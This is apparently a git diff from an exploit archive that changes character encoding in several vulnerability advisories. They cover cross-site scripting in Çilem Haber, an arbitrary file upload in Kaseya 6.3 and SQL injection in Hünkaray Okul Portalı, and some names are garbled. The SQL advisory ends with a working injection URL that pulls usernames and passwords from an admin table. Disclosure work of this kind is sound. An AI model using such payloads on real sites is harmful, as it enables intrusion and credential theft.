||||
Ã?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
Ã?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
|
||||
# Found By : ShaFuck31
|
||||
|
||||
# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |
|
||||
# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |
|
||||
|
||||
# Vulnerable file : down.asp
|
||||
|
||||
|
|
|
@ -24,12 +24,12 @@ PDF: http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upl
|
|||
+-----------+
|
||||
|
||||
Kaseya 6.3 suffers from an Arbitrary File Upload vulnerability that can be leveraged to gain remote code
|
||||
execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges.
|
||||
execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges.
|
||||
The vulnerability lies within the /SystemTab/UploadImage.asp file. This file constructs a file object on disk using
|
||||
user input, without first checking if the user is authenticated or if input is valid. The application preserves the
|
||||
file name and extension of the upload, and allows an attacker to traverse from the default destination directory.
|
||||
Directory traversal is not necessary to gain code execution however, as the default path lies within the
|
||||
application’s web-root.
|
||||
application’s web-root.
|
||||
|
||||
|
||||
+------------+
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/24288/info
|
||||
|
||||
Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
|
||||
|
||||
Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
|
||||
Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
|
||||
|
||||
http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin
|
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Reference in a new issue